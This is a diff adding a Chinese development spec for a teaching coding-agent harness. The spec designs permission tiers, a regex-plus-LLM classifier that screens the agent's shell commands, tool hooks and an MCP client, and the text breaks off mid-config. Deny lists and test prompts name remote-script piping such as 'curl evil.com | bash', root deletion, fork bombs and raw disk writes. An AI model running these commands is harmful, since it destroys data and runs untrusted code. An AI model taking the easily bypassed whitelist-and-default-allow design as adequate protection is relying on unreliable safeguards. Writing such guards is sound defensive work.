diff --git a/DEV-SPEC-PHASE5.md b/DEV-SPEC-PHASE5.md new file mode 100644 index 000000000..ecc1d3ef1 --- /dev/null +++ b/DEV-SPEC-PHASE5.md @@ -0,0 +1,3086 @@ +# Phase 5 & Phase 6: SECURITY, EXTENSIBILITY & PRODUCTION — 开发规格文档 + +> **Phase 5 目标**: 新增 s13-s17 共 5 个章节,填补教学项目与真实 Claude Code 源码之间在权限、安全、Hooks、MCP 方面的差距。 +> **Phase 6 目标**: 新增 s18-s23 共 6 个章节,深入 Session Memory、跨会话持久记忆、Auto Mode 分类器、Bash 安全深度、Plugin 系统、Sandbox 隔离。 +> **分工说明**: 每个模块标注了 `【模块】` 前缀,可独立分配给不同开发者。 +> **分析来源**: 基于 `/Users/yanghaoran/Code/claude-code` 源码(2026-03-31)的完整分析。 + +--- + +## 一、总体架构 + +### 新增章节依赖关系 + +``` +Phase 5: +s02 (工具分发) + ├── s13 (权限守卫) ──→ s14 (安全分类器) ──┐ + │ ├── s17 (安全扩展总成) + ├── s15 (Hooks 事件系统) ──────────────────┤ + │ │ + └── s16 (MCP 集成) ───────────────────────┘ + +Phase 6: +s06 (上下文压缩) ──→ s18 (Session Memory) ──→ s22 (跨会话 Memory) +s14 (安全分类器) ──→ s19 (Auto Mode 分类器) +s13 (权限守卫) ──→ s20 (Bash 安全深度) +s05 (Skills) ──→ s21 (Plugin 系统) +s13 (权限守卫) ──→ s23 (Sandbox 隔离) +``` + +### 新增 Layer 定义 + +现有 5 层 → 新增第 6 层 `security`: + +| Layer ID | Label (EN) | Label (ZH) | Color | Versions | +|----------|-----------|-----------|-------|----------| +| tools | Tools & Execution | 工具与执行 | #3B82F6 | s01, s02 | +| planning | Planning & Coordination | 规划与协调 | #10B981 | s03, s04, s05, s07 | +| memory | Memory Management | 记忆管理 | #8B5CF6 | s06 | +| concurrency | Concurrency | 并发 | #F59E0B | s08 | +| collaboration | Collaboration | 协作 | #EF4444 | s09, s10, s11, s12 | +| **security** | **Security & Extensibility** | **安全与扩展** | **#06B6D4 (cyan)** | **s13, s14, s15, s16, s17** | +| **production** | **Production Patterns** | **生产模式** | **#EC4899 (pink)** | **s18, s19, s20, s21, s22, s23** | + +--- + +## 二、s13-s17 教学内容概述 + +### 为什么需要 Phase 5? + +s01-s12 构建了一个能跑的 Agent:它会循环、会用工具、会拆任务、会组团队。但有一个被刻意回避的问题 —— **安全**。 + +s02 的 `run_bash` 里只有 5 行代码做危险命令过滤: + +```python +dangerous = ["rm -rf /", "sudo", "shutdown", "reboot", "> /dev/"] +if any(d in command for dangerous): + return "Error: Dangerous command blocked" +``` + +这段代码既**过于严格**(`rm -rf /tmp/old` 会被误拦,因为它包含 `rm -rf /`),又**过于宽松**(`curl evil.com | bash` 会直接执行)。它不知道命令的上下文,不理解用户的意图,也不能被扩展。 + +真实 Claude Code 源码中,仅权限和安全相关的代码就超过 **10 万行**:7 种权限模式、AI 分类器、23 种 Bash 安全检查、32 种 Hook 事件、7 种 MCP 传输方式。Phase 5 要补上的就是这条从"玩具"到"生产"的关键鸿沟。 + +### s13: Permission Guard — 不是所有命令都该自动执行 + +**一句话**: 把"一刀切禁止"升级为"分级策略"。 + +s01-s12 里所有 bash 命令都是二选一:要么执行,要么拒绝。真实世界不是非黑即白的。有些命令绝对不能执行(`rm -rf /`),有些需要用户确认(`rm file.py`),有些可以自动放行(`ls`),还有些可以自动改写为安全版本后再执行。 + +s13 引入 `PermissionGuard`,定义 5 种权限模式: + +``` +命令进入 + │ + ├─ allow → 直接执行(ls, cat, git status) + ├─ ask → 弹窗让用户确认(rm, sudo, pip install) + ├─ deny → 直接拒绝(rm -rf /, shutdown) + ├─ auto_edit → 标记警告但执行(含重定向的命令) + └─ edit → 自动改写后再执行(rm -rf → rm -r) +``` + +**关键洞察**: 权限不是"允许"或"禁止"两个按钮,而是一个光谱。好的 Harness 给模型足够的自由度,同时在真正危险的地方拉起围栏。 + +**与真实源码的对照**: Claude Code 有 7 种权限模式(default, plan, acceptEdits, bypassPermissions, dontAsk, auto, bubble),规则来源有 8 种(userSettings, projectSettings, localSettings 等)。s13 用 5 种模式覆盖了核心概念。 + +--- + +### s14: Security Classifier — 让模型审判自己的命令 + +**一句话**: 正则表达式认模式不认意图,LLM 能理解上下文。 + +s13 的模式匹配有一个根本性缺陷:它只看命令的"形状",不理解"意图"。`rm -rf build/` 和 `rm -rf /` 看起来一模一样,但前者是正常的构建清理,后者是灾难性操作。 + +s14 引入**两层分类管线**: + +``` +命令 + │ + └─ Layer 1: 正则快筛(零成本,~15 种已知危险模式) + │ + ├─ 命中 → deny/ask(确定性结果,无需 LLM) + │ + └─ 未命中 → Layer 2: LLM 分类(~10 tokens/次) + │ + ├─ safe → allow + ├─ moderate → ask(需要用户确认) + └─ dangerous → deny +``` + +正则快筛处理已知威胁(速度快、零成本),LLM 分类处理未知命令(理解上下文、判断意图)。两层配合,既高效又准确。 + +**关键洞察**: LLM 分类器不是"更高级的正则",而是一种完全不同的安全思路 —— 从"匹配危险模式"变成"理解命令意图"。模型能区分 `rm -rf node_modules/`(正常清理)和 `rm -rf ~`(灾难操作),因为它们在语义上完全不同。 + +**与真实源码的对照**: Claude Code 的 `yoloClassifier` 是一个 52KB 的安全分类器,会分析整个对话历史来判断命令安全性。`bashSecurity.ts` 包含 23 种检查模式,涵盖命令替换检测、heredoc 注入、Zsh 危险命令等。s14 用两层管线覆盖了核心思路。 + +--- + +### s15: Hooks System — 在模型和工具之间插一个拦截层 + +**一句话**: 不改工具代码,也能改变工具的行为。 + +s13-s14 的安全检查是写死在 `run_bash` 函数内部的。如果你想实现"每次写文件后自动 git add"或"每次 bash 命令前记录审计日志",必须修改每个工具函数的源码。这违反了开闭原则。 + +s15 引入 `HookManager`,在工具执行的"之前"和"之后"定义拦截点: + +``` +LLM 调用工具 + │ + ▼ +[Pre-tool Hook] ──block──> 返回 "被 hook 拦截" + │ + ▼ +[执行工具 handler] + │ + ▼ +[Post-tool Hook] ──observe──> 记录日志、触发副作用 + │ + ▼ +返回结果 +``` + +Hook 有 3 种模式:**observe**(只看不改)、**modify**(改参数或结果)、**block**(直接拦截)。教学版实现 8 种事件(PreToolUse, PostToolUse, PreBash, PostBash, AgentStart, AgentStop, OnError, OnCompact),覆盖了工具执行的全生命周期。 + +**关键洞察**: Hooks 把"安全检查"从工具内部移到了工具外部。工具只需要做自己的事(执行命令、读写文件),拦截逻辑全部由 Hook 管理。这意味着你可以动态注册新 Hook,而不需要修改任何工具代码。 + +**与真实源码的对照**: Claude Code 有 32 种 Hook 事件和 3 种执行方式(Shell Hook, Agent Hook, HTTP Hook)。教学版用 8 种事件 + 3 种模式覆盖了核心概念,并内置了 3 个演示 Hook(审计日志、危险命令拦截、自动 git add)。 + +--- + +### s16: MCP Client — 工具不必内建,外部服务器也能提供 + +**一句话**: 把工具分发从 Python 字典升级为网络协议。 + +s02-s15 的所有工具都是 Python 函数,写死在 `TOOL_HANDLERS` 字典里。如果你想加一个"查数据库"的工具,必须写 Python 代码、重启进程。真实世界里,工具可能来自任何地方:数据库查询、API 调用、文件分析器…… + +s16 引入 MCP(Model Context Protocol)客户端,通过标准协议连接外部工具服务器: + +``` +Agent 启动 + │ + ▼ +[MCPClient 连接 stdio 服务器] + │ + ▼ +[discover_tools() 发现外部工具] ← JSON-RPC: tools/list + │ + ▼ +[注册到 TOOL_HANDLERS] ← 动态扩展,无需改源码 + │ + ▼ +agent_loop 正常运行 +LLM 调用 "count_lines" → MCP 路由 → 外部服务器执行 +``` + +MCP 的核心思想是**协议统一**:不管是本地子进程(stdio)还是远程 HTTP 端点,工具的发现、调用、返回都用同一个 JSON-RPC 协议。教学版支持 2 种传输方式(stdio 和 streamable_http),并内置了一个 Mock 文件分析服务器用于演示。 + +**关键洞察**: MCP 把"工具"从一个 Python 函数变成一个**网络服务**。这意味着任何人都可以用任何语言编写工具服务器,Agent 只需要知道协议就能调用。这是从"单体应用"到"微服务架构"的转变。 + +**与真实源码的对照**: Claude Code 的 MCP 客户端(`services/mcp/client.ts`)有 119KB,支持 7 种传输方式(stdio, sse, sse-ide, http, ws, ws-ide, sdk)和 OAuth 认证(89KB)。教学版用 2 种传输方式和内置 Mock 服务器覆盖了核心概念。 + +--- + +### s17: Secure Extension Harness — 四道防线,一个循环 + +**一句话**: 各层职责清晰,互不干扰,这才是生产级 Harness 的核心。 + +s13-s16 各自是一个能跑的独立 Agent。但真实系统需要所有层同时工作。s17 把它们组合成一条清晰的执行管线: + +``` +LLM 调用工具 + │ + ▼ +[1] PreToolUse Hook ──block──> 返回错误 ← s15 + │ + ▼ +[2] Security Classifier ──deny───> 返回错误 ← s14 + │ + ▼ +[3] Permission Guard ──deny───> 返回错误 ← s13 + │ ──ask───> 用户确认 + │ + ▼ +[4] Execute (内建 or MCP) ← s02 + s16 + │ + ▼ +[5] PostToolUse Hook (审计日志) ← s15 + │ + ▼ +返回结果 +``` + +每一层只回答一个问题: +- Hook: "这个动作需要被拦截吗?" +- Classifier: "这个命令的意图是什么?" +- Permission: "这个意图被允许吗?" +- Execute: "执行并返回结果" + +层与层之间不通信、不耦合。你可以拔掉任何一层,其他层不受影响。 + +**关键洞察**: 生产级 Harness 的核心不是"功能多",而是"职责清"。每一层是一个独立的策略单元,可以单独测试、单独替换、单独关闭。这种架构让你在面对新的安全威胁时,只需要增加一层,而不是重写整个系统。 + +**与真实源码的对照**: Claude Code 的 `execute_tool` 管线包含了更多层:Prompt 缓存检查、Token 预算检查、并发安全检查、结果大小截断等。但核心架构与 s17 一致:预检查 → 执行 → 后处理。 + +--- + +### Phase 5 课程总结 + +| 章节 | 核心问题 | 回答 | 新增机制 | +|------|---------|------|---------| +| **s13** | 谁来决定能不能执行? | 权限策略 | PermissionGuard (5 种模式) | +| **s14** | 怎么判断命令是否危险? | 两层分类 | SecurityClassifier (regex + LLM) | +| **s15** | 在哪里拦截工具调用? | 生命周期插桩 | HookManager (8 种事件, 3 种模式) | +| **s16** | 怎么接入外部工具? | 标准协议 | MCPClient + MCPManager (stdio/http) | +| **s17** | 怎么让所有层协同工作? | 执行管线 | 5 层管线: Hook → Classify → Permission → Execute → PostHook | + +--- + +## 四、后端课程文件 (Python) + +### 【模块 A】s13: Permission Guard (权限守卫) + +**文件**: `agents/s13_permission_guard.py` +**预计行数**: ~230 行 +**依赖**: s02 + +#### 文件头部模板 + +```python +#!/usr/bin/env python3 +# Harness: permission guard -- not every command should run automatically. +""" +s13_permission_guard.py - Permission Guard + +The 5-line string filter from s02 was a toy. Real systems need a +permission model: allow / ask / deny / auto-edit / edit. + + Command flow: + + LLM calls bash tool + | + v + +------------------+ + | PermissionGuard | + | classify() | + +--------+---------+ + | + +-------+-------+-------+-------+ + | | | | | + [allow] [ask] [deny] [auto] [edit] + | | | | | + v v v v v + execute prompt block flag rewrite + user edit in-place + +Key insight: "把 '禁止' 升级为 '策略' -- 从一条 if 到一个权限模型。" +""" +``` + +#### 常量定义 + +```python +PERMISSION_MODES = ("allow", "ask", "deny", "auto_edit", "edit") + +# 自动放行的命令基础名 +ALLOWED_COMMANDS = { + "ls", "cat", "pwd", "echo", "head", "tail", "wc", "sort", + "grep", "find", "git", "which", "type", "file", "diff", + "python", "python3", "node", "npm", "pip", +} + +# 始终拒绝的模式 (正则) +DENIED_PATTERNS = [ + (r"rm\s+-rf\s+/(?!\w)", "Root directory recursive delete"), + (r"sudo\s+rm", "sudo + rm"), + (r">\s*/etc/", "Overwrite system config"), + (r"mkfs\.", "Format filesystem"), + (r"dd\s+.*of=/dev/", "Raw disk write"), + (r":\(\)\{.*:\|:&\}", "Fork bomb"), + (r"shutdown|reboot|halt|poweroff", "System shutdown"), + (r"chmod\s+-R\s+777\s+/", "Recursive 777 on root"), + (r"curl.*\|\s*(ba)?sh", "Remote script execution"), + (r"wget.*\|\s*(ba)?sh", "Remote script execution"), +] + +# 需要用户确认的模式 +ASK_PATTERNS = [ + (r"rm\s+", "File deletion"), + (r"sudo\s+", "Elevated privileges"), + (r"pip\s+install", "Package installation"), + (r"npm\s+install", "Package installation"), + (r"git\s+push", "Git push"), + (r"git\s+reset", "Git reset"), + (r"docker\s+rm", "Docker remove"), + (r"kill\s+", "Process termination"), +] + +# 命令改写规则: (匹配模式, 替换) -- 仅示例 +EDIT_REWRITE_RULES = [ + (r"rm\s+-rf\s+(.*)", r"rm -r \1 # auto-removed -f flag"), +] +``` + +#### 核心类 + +```python +import re +from dataclasses import dataclass +from pathlib import Path + +@dataclass +class PermissionResult: + mode: str # allow / ask / deny / auto_edit / edit + allowed: bool + command: str # 可能被改写后的命令 + reason: str + +class PermissionGuard: + def __init__(self, config_path: Path = None): + """可从 .permissions.json 加载自定义规则覆盖默认规则""" + self._denied = [(re.compile(p), r) for p, r in DENIED_PATTERNS] + self._ask = [(re.compile(p), r) for p, r in ASK_PATTERNS] + self._edit = [(re.compile(p), r) for p, r in EDIT_REWRITE_RULES] + # TODO: load from config_path if provided + + def classify(self, command: str) -> tuple[str, str]: + """返回 (mode, reason)""" + # 1. deny 检查 + for pat, reason in self._denied: + if pat.search(command): + return ("deny", reason) + # 2. 白名单放行 + base = command.split()[0] if command.split() else "" + if base in ALLOWED_COMMANDS: + return ("allow", "") + # 3. edit 改写 + for pat, replacement in self._edit: + if pat.search(command): + rewritten = pat.sub(replacement, command) + return ("edit", rewritten) + # 4. ask 确认 + for pat, reason in self._ask: + if pat.search(command): + return ("ask", reason) + # 5. 默认放行 + return ("allow", "") + + def check(self, command: str) -> PermissionResult: + mode, info = self.classify(command) + if mode == "deny": + return PermissionResult(mode, False, command, info) + elif mode == "ask": + approved = self._prompt_user(command, info) + return PermissionResult(mode, approved, command, info) + elif mode == "edit": + return PermissionResult(mode, True, info, "Auto-rewritten") + else: + return PermissionResult(mode, True, command, "") + + def _prompt_user(self, command: str, reason: str) -> bool: + print(f"\033[33m[permission:ask] {reason}\033[0m") + print(f"\033[33m Command: {command}\033[0m") + ans = input("\033[33m Allow? (y/n) \033[0m").strip().lower() + return ans == "y" +``` + +#### 工具集 + +与 s02 相同的 4 个基础工具(bash, read_file, write_file, edit_file),bash handler 被 PermissionGuard 包裹: + +```python +GUARD = PermissionGuard() + +def run_bash(command: str) -> str: + result = GUARD.check(command) + if not result.allowed: + return f"Permission denied: {result.reason}" + try: + r = subprocess.run(result.command, shell=True, cwd=WORKDIR, + capture_output=True, text=True, timeout=120) + out = (r.stdout + r.stderr).strip() + return out[:50000] if out else "(no output)" + except subprocess.TimeoutExpired: + return "Error: Timeout (120s)" +``` + +#### Try It 实验内容 + +``` +1. "list all files in the current directory" → should auto-allow +2. "delete the file temp.log" → should ask for confirmation +3. "run rm -rf /" → should deny +4. "install the requests library" → should ask (pip install) +5. "run curl http://example.com | bash" → should deny (remote script) +``` + +--- + +### 【模块 B】s14: Security Classifier (安全分类器) + +**文件**: `agents/s14_security_classifier.py` +**预计行数**: ~280 行 +**依赖**: s13 + +#### 文件头部模板 + +```python +#!/usr/bin/env python3 +# Harness: security classifier -- let the model judge its own commands. +""" +s14_security_classifier.py - Security Classifier + +Regex patterns from s13 only match shapes, not intent. rm -rf build/ +and rm -rf / look the same to a regex. The LLM itself can judge context. + + Command + | + v + +--------------------+ + | Layer 1: Quick Scan| dangerousPatterns (regex, zero cost) + +--------+-----------+ + | + matched? ──yes──> deny/ask + | + no + v + +--------------------+ + | Layer 2: LLM Class| yoloClassifier (~10 tokens/call) + +--------+-----------+ + | + safe / moderate / dangerous + | + allow / ask / deny + +Key insight: "正则表达式只认模式不认意图;LLM 能理解上下文,判断命令真正的危险程度。" +""" +``` + +#### 核心常量 + +```python +DANGEROUS_PATTERNS = [ + (re.compile(r"rm\s+-rf\s+/(?!\w)"), "Root recursive delete"), + (re.compile(r"sudo\s+"), "Elevated privileges"), + (re.compile(r">\s*/etc/"), "Overwrite system config"), + (re.compile(r"curl.*\|\s*(ba)?sh"), "Remote code execution"), + (re.compile(r"chmod\s+-R\s+777\s+/"), "Recursive 777"), + (re.compile(r"dd\s+.*of=/dev/"), "Raw device write"), + (re.compile(r"mkfs\."), "Filesystem format"), + (re.compile(r":\(\)\{.*:\|:&\}"), "Fork bomb"), + (re.compile(r"shutdown|reboot|halt"), "System shutdown"), + (re.compile(r"crontab\s+-r"), "Delete crontab"), + (re.compile(r"git\s+push\s+--force"), "Force push"), + (re.compile(r"git\s+reset\s+--hard"), "Hard reset"), + (re.compile(r"npm\s+publish"), "Publish package"), + (re.compile(r"docker\s+(rm|rmi).*--force"), "Force remove container"), + (re.compile(r">\s*/dev/sd"), "Write to raw disk"), +] + +SAFE_COMMANDS = { + "ls", "cat", "pwd", "echo", "head", "tail", "wc", "sort", + "grep", "find", "git", "which", "type", "file", "diff", + "python", "python3", "node", "npm", "pip", "tree", "du", + "stat", "date", "whoami", "hostname", "uname", +} + +CLASSIFIER_PROMPT = """Classify this shell command's danger level. +Reply with EXACTLY one word: safe, moderate, or dangerous. + +- safe: read-only or non-destructive (ls, cat, git status) +- moderate: writes files but recoverable (rm single file, pip install) +- dangerous: irreversible or system-wide (rm -rf /, sudo, force push) + +Command: {command} +Context (last task): {context}""" +``` + +#### 核心类 + +```python +class SecurityClassifier: + def __init__(self, client, model): + self.client = client + self.model = model + + def quick_scan(self, command: str) -> tuple[str, str] | None: + """Layer 1: 正则快筛。返回 (level, reason) 或 None""" + for pat, reason in DANGEROUS_PATTERNS: + if pat.search(command): + return ("dangerous", reason) + return None + + def llm_classify(self, command: str, context: str = "") -> str: + """Layer 2: LLM 分类。返回 safe/moderate/dangerous""" + prompt = CLASSIFIER_PROMPT.format(command=command, context=context[-300:]) + resp = self.client.messages.create( + model=self.model, + messages=[{"role": "user", "content": prompt}], + max_tokens=10, + ) + answer = resp.content[0].text.strip().lower() + # 容错:只取第一个有效词 + for level in ("safe", "moderate", "dangerous"): + if level in answer: + return level + return "moderate" # 默认中等风险 + + def classify(self, command: str, context: str = "") -> dict: + """完整分类管线""" + # Layer 1 + quick = self.quick_scan(command) + if quick: + level, reason = quick + mode = {"dangerous": "deny", "moderate": "ask"}.get(level, "deny") + return {"level": level, "mode": mode, "reason": reason, "source": "pattern"} + + # 白名单 + base = command.split()[0] if command.split() else "" + if base in SAFE_COMMANDS: + return {"level": "safe", "mode": "allow", "reason": "", "source": "whitelist"} + + # Layer 2 + level = self.llm_classify(command, context) + mode = {"safe": "allow", "moderate": "ask", "dangerous": "deny"}[level] + return {"level": level, "mode": mode, "reason": f"LLM classified as {level}", "source": "llm"} +``` + +#### PermissionGuard 改造 + +```python +class PermissionGuard: + def __init__(self, classifier: SecurityClassifier = None): + self.classifier = classifier + + def check(self, command: str, context: str = "") -> PermissionResult: + if self.classifier: + result = self.classifier.classify(command, context) + mode = result["mode"] + if mode == "deny": + return PermissionResult("deny", False, command, result["reason"]) + elif mode == "ask": + approved = self._prompt_user(command, result["reason"]) + return PermissionResult("ask", approved, command, result["reason"]) + else: + return PermissionResult("allow", True, command, "") + # fallback to s13 pattern matching + ... +``` + +#### Try It 实验内容 + +``` +1. "delete the build/ directory" → LLM 应判断为 moderate (ask) +2. "list all python files" → quick scan whitelist -> allow +3. "run git push --force origin main" → quick scan pattern -> deny +4. "run pip install numpy" → LLM 应判断为 moderate (ask) +5. "create a new file called test.py" → LLM 应判断为 safe (allow) +``` + +--- + +### 【模块 C】s15: Hooks System (Hooks 事件系统) + +**文件**: `agents/s15_hooks_system.py` +**预计行数**: ~300 行 +**依赖**: s13 + +#### 文件头部模板 + +```python +#!/usr/bin/env python3 +# Harness: hooks system -- intercept between model and tool. +""" +s15_hooks_system.py - Hooks System + +Security checks from s13-s14 are hardcoded inside handlers. +Hooks let you intercept, modify, or block tool calls without +touching any handler code. + + LLM calls tool + | + v + +-------------------+ + | Pre-tool Hook | ──block──> return "blocked by hook" + +--------+----------+ + | (if not blocked) + v + +-------------------+ + | Execute handler | + +--------+----------+ + | + v + +-------------------+ + | Post-tool Hook | (observe/log/modify result) + +--------+----------+ + | + v + return result + +Key insight: "Hooks 不改变工具的行为,但改变了工具何时、如何、是否被执行。" +""" +``` + +#### 核心常量 + +```python +HOOK_EVENTS = ( + "PreToolUse", # 工具执行前 + "PostToolUse", # 工具执行后 + "PreBash", # bash 执行前 (更细粒度) + "PostBash", # bash 执行后 + "AgentStart", # agent_loop 启动 + "AgentStop", # agent_loop 结束 + "OnError", # 工具出错 + "OnCompact", # 上下文压缩 +) + +HOOK_MODES = ("observe", "modify", "block") +``` + +#### 核心类 + +```python +from dataclasses import dataclass, field +from typing import Callable +from pathlib import Path +import json + +@dataclass +class Hook: + event: str + mode: str + handler: Callable + name: str + description: str = "" + tool_filter: str | None = None # 仅匹配特定工具 + +class HookManager: + def __init__(self, hooks_dir: Path = None): + self._hooks: dict[str, list[Hook]] = {e: [] for e in HOOK_EVENTS} + self._hooks_dir = hooks_dir or WORKDIR / ".hooks" + self._hooks_dir.mkdir(exist_ok=True) + self._load_defaults() + + def _load_defaults(self): + """注册 3 个内置 hook""" + # 1. bash 审计日志 + self.register("PreBash", "observe", self._audit_log, + "bash_audit_log", "Log all bash commands to audit.jsonl") + # 2. 危险命令拦截 (与 s13 协同) + self.register("PreBash", "block", self._dangerous_block, + "dangerous_command_block", "Block known dangerous patterns") + # 3. 自动 git add + self.register("PostToolUse", "observe", self._auto_git_add, + "auto_git_add", "Auto git add after write/edit", + tool_filter="write_file") + + def register(self, event: str, mode: str, handler: Callable, + name: str, description: str = "", tool_filter: str = None): + hook = Hook(event, mode, handler, name, description, tool_filter) + self._hooks[event].append(hook) + + def unregister(self, name: str): + for event in self._hooks: + self._hooks[event] = [h for h in self._hooks[event] if h.name != name] + + def fire(self, event: str, context: dict) -> dict | None: + """ + 返回 None = 继续 + 返回 {"action": "block", "reason": "..."} = 阻止 + 返回 {"action": "modify", **overrides} = 修改参数 + """ + for hook in self._hooks.get(event, []): + # tool_filter 检查 + if hook.tool_filter and context.get("tool") != hook.tool_filter: + continue + result = hook.handler(context) + if result is None: + continue # observe + if isinstance(result, str): + return {"action": "block", "reason": result, "hook": hook.name} + if isinstance(result, dict): + if result.get("action") == "block": + return result + if result.get("action") == "modify": + context.update(result.get("modify", {})) + return None + + def list_hooks(self) -> str: + lines = [] + for event, hooks in self._hooks.items(): + for h in hooks: + lines.append(f" {event:15} [{h.mode:7}] {h.name}: {h.description}") + return "\n".join(lines) + + # --- 内置 Hook 处理函数 --- + + def _audit_log(self, context: dict) -> None: + log_file = self._hooks_dir / "audit.jsonl" + entry = {"tool": context.get("tool"), "command": context.get("input", {}).get("command")} + log_file.open("a").write(json.dumps(entry) + "\n") + + def _dangerous_block(self, context: dict) -> str | None: + cmd = context.get("input", {}).get("command", "") + dangerous = ["rm -rf /", "curl.*| sh", "mkfs", "dd of=/dev/"] + import re + for d in dangerous: + if re.search(d, cmd): + return f"Dangerous pattern blocked: {d}" + + def _auto_git_add(self, context: dict) -> None: + path = context.get("input", {}).get("path", "") + if path: + subprocess.run(["git", "add", path], cwd=WORKDIR, + capture_output=True, text=True) +``` + +#### 工具集 (新增 2 个) + +```python +# hook_register 工具 +{ + "name": "hook_register", + "description": "Register a hook to intercept tool calls. Events: PreToolUse, PostToolUse, PreBash, PostBash, AgentStart, AgentStop, OnError, OnCompact. Modes: observe, modify, block.", + "input_schema": { + "type": "object", + "properties": { + "event": {"type": "string", "description": "Hook event name"}, + "mode": {"type": "string", "description": "observe, modify, or block"}, + "name": {"type": "string", "description": "Unique hook name"}, + "description": {"type": "string", "description": "What this hook does"}, + "tool_filter": {"type": "string", "description": "Only trigger for this tool name"} + }, + "required": ["event", "mode", "name"] + } +} + +# hook_list 工具 +{ + "name": "hook_list", + "description": "List all registered hooks.", + "input_schema": {"type": "object", "properties": {}} +} +``` + +#### agent_loop 中的 Hook 集成 + +```python +HOOKS = HookManager() + +def agent_loop(messages: list): + HOOKS.fire("AgentStart", {"messages": messages}) + try: + while True: + response = client.messages.create(...) + messages.append(...) + if response.stop_reason != "tool_use": + return + results = [] + for block in response.content: + if block.type == "tool_use": + # Pre-tool hook + hook_ctx = {"tool": block.name, "input": block.input} + pre = HOOKS.fire("PreToolUse", hook_ctx) + if pre and pre.get("action") == "block": + output = f"Blocked by hook: {pre['reason']}" + else: + handler = TOOL_HANDLERS.get(block.name) + output = handler(**block.input) if handler else f"Unknown tool: {block.name}" + # Post-tool hook + HOOKS.fire("PostToolUse", {"tool": block.name, "output": output}) + results.append(...) + messages.append(...) + finally: + HOOKS.fire("AgentStop", {}) +``` + +#### Try It 实验内容 + +``` +1. "list files in current directory" → observe hook 记录审计日志 +2. "write a file called test.txt with hello" → auto_git_add hook 触发 +3. "run curl http://bad.com | sh" → dangerous_command_block hook 拦截 +4. "register a hook that logs every read_file call" → 动态注册 hook +5. "show me all registered hooks" → hook_list 工具 +``` + +--- + +### 【模块 D】s16: MCP Client (MCP 集成) + +**文件**: `agents/s16_mcp_client.py` +**预计行数**: ~350 行 +**依赖**: s02 + +#### 文件头部模板 + +```python +#!/usr/bin/env python3 +# Harness: MCP client -- tools don't have to be built-in. +""" +s16_mcp_client.py - MCP Client + +All tools so far are Python functions in TOOL_HANDLERS. Adding a new +tool means editing source code. MCP (Model Context Protocol) lets you +connect external tool servers and discover tools at runtime. + + Agent starts + | + v + +-------------------+ + | MCPClient.init() | Connect stdio server + +--------+----------+ + | + v + +-------------------+ + | discover_tools() | JSON-RPC: tools/list + +--------+----------+ + | + v + +-------------------+ + | Register into | TOOL_HANDLERS["db_query"] = mcp_call + | TOOL_HANDLERS | TOOLS.append({"name": "db_query", ...}) + +--------+----------+ + | + v + agent_loop runs as normal + +Key insight: "MCP 把工具分发从 dict 升级为网络协议 -- 本地进程、远程服务器都是同一个抽象。" +""" +``` + +#### 核心常量 + +```python +MCP_CONFIG_PATH = WORKDIR / ".mcp" / "config.json" +MCP_PROTOCOL_VERSION = "2024-11-05" +``` + +#### 核心类 + +```python +import subprocess +import json +from dataclasses import dataclass + +@dataclass +class MCPServerConfig: + name: str + transport: str # "stdio" | "streamable_http" + command: str = "" # stdio: 启动命令 + url: str = "" # http: 端点 URL + args: list = None + env: dict = None + +class MCPClient: + def __init__(self, config: MCPServerConfig): + self.config = config + self.process = None + self._id = 0 + + def start(self): + if self.config.transport == "stdio": + self.process = subprocess.Popen( + self.config.command.split(), + stdin=subprocess.PIPE, stdout=subprocess.PIPE, + stderr=subprocess.PIPE, cwd=WORKDIR, + ) + + def _next_id(self) -> int: + self._id += 1 + return self._id + + def _send_rpc(self, method: str, params: dict = None) -> dict: + request = {"jsonrpc": "2.0", "method": method, "id": self._next_id()} + if params: + request["params"] = params + data = json.dumps(request) + "\n" + self.process.stdin.write(data.encode()) + self.process.stdin.flush() + line = self.process.stdout.readline().decode().strip() + return json.loads(line).get("result", {}) if line else {} + + def discover_tools(self) -> list: + result = self._send_rpc("tools/list") + return result.get("tools", []) + + def call(self, tool_name: str, arguments: dict) -> str: + result = self._send_rpc("tools/call", { + "name": tool_name, "arguments": arguments + }) + contents = result.get("content", []) + return "\n".join(c.get("text", "") for c in contents if c.get("type") == "text") + + def shutdown(self): + if self.process: + self.process.terminate() + self.process.wait(timeout=5) + +class MCPManager: + def __init__(self, config_path: Path = None): + self._clients: dict[str, MCPClient] = {} + self._tools: dict[str, tuple[str, dict]] = {} # tool_name -> (server_name, schema) + self._config_path = config_path or MCP_CONFIG_PATH + + def load_config(self) -> list[MCPServerConfig]: + if not self._config_path.exists(): + return [] + data = json.loads(self._config_path.read_text()) + servers = data.get("mcpServers", {}) + return [MCPServerConfig(name=k, **v) for k, v in servers.items()] + + def connect_all(self) -> list[dict]: + """连接所有配置的服务器,返回发现的工具列表""" + discovered = [] + for config in self.load_config(): + client = MCPClient(config) + client.start() + tools = client.discover_tools() + self._clients[config.name] = client + for tool in tools: + self._tools[tool["name"]] = (config.name, tool) + discovered.append(tool) + return discovered + + def call(self, tool_name: str, arguments: dict) -> str: + if tool_name not in self._tools: + return f"Unknown MCP tool: {tool_name}" + server_name, _ = self._tools[tool_name] + return self._clients[server_name].call(tool_name, arguments) + + def shutdown_all(self): + for client in self._clients.values(): + client.shutdown() + + def list_servers(self) -> str: + lines = [] + for name, client in self._clients.items(): + tools = [t for t, (s, _) in self._tools.items() if s == name] + lines.append(f" {name} ({client.config.transport}): {len(tools)} tools") + return "\n".join(lines) +``` + +#### Mock MCP Server (教学用) + +```python +# 内置在 s16 文件中,用于演示,不需要外部依赖 +class MockMCPServer: + """一个简单的文件分析 MCP 服务器,作为教学演示""" + + TOOLS = [ + { + "name": "count_lines", + "description": "Count lines in a file", + "inputSchema": { + "type": "object", + "properties": {"path": {"type": "string"}}, + "required": ["path"], + }, + }, + { + "name": "search_content", + "description": "Search for a pattern in files", + "inputSchema": { + "type": "object", + "properties": { + "pattern": {"type": "string"}, + "path": {"type": "string"}, + }, + "required": ["pattern"], + }, + }, + ] + + def handle(self, method: str, params: dict) -> dict: + if method == "tools/list": + return {"tools": self.TOOLS} + elif method == "tools/call": + name = params.get("name") + args = params.get("arguments", {}) + if name == "count_lines": + path = safe_path(args.get("path", "")) + count = len(path.read_text().splitlines()) if path.exists() else 0 + return {"content": [{"type": "text", "text": f"{count} lines"}]} + elif name == "search_content": + import re + pattern = args.get("pattern", "") + results = [] + for f in WORKDIR.rglob("*.py"): + for i, line in enumerate(f.read_text().splitlines(), 1): + if re.search(pattern, line): + results.append(f"{f.name}:{i}: {line.strip()}") + text = "\n".join(results[:20]) or "No matches found" + return {"content": [{"type": "text", "text": text}]} + return {} +``` + +#### MCP 配置文件示例 + +**文件**: `.mcp/config.json` + +```json +{ + "mcpServers": { + "file-analyzer": { + "transport": "stdio", + "command": "python 